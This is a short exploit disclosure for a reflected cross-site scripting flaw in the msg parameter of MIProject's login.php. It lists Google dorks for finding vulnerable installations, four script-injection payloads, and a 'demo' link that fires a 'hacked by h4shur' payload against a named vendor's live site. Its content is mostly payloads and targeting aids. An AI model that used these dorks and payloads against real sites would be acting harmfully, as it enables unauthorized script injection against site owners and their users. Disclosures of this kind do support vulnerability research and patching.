[+] Title: MIProject Cross Site Scripting (XSS)
[+] date: 2021-01-31
[+] Author: s433d3h
[+] Vendor Homepage: mirchevideas.com
[+] Tested on: Windows 10 & Google Chrome
[+] Vulnerable File: /login.php?msg=
[+] Vulnerable Parameter: Get Method
[+] Dork: intext:"Powered by MIProject."
intext:"Powered by MIProject." inurl:"/login.php?msg="
### POC:
[+} site.com/login.php?msg=
### Xss Alert Code: "><script>alert()</script>
"><svg onload=alert()>
'><script>alert('');</script>
<IMG "'"><script>alert()</script>'>
And Etc.
### Demo:
[+] https://project.mirchevideas.com/clients/login.php?msg=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E
### thanks to :
* h4shur
### Contact Me :
* twitter.com/s433d3h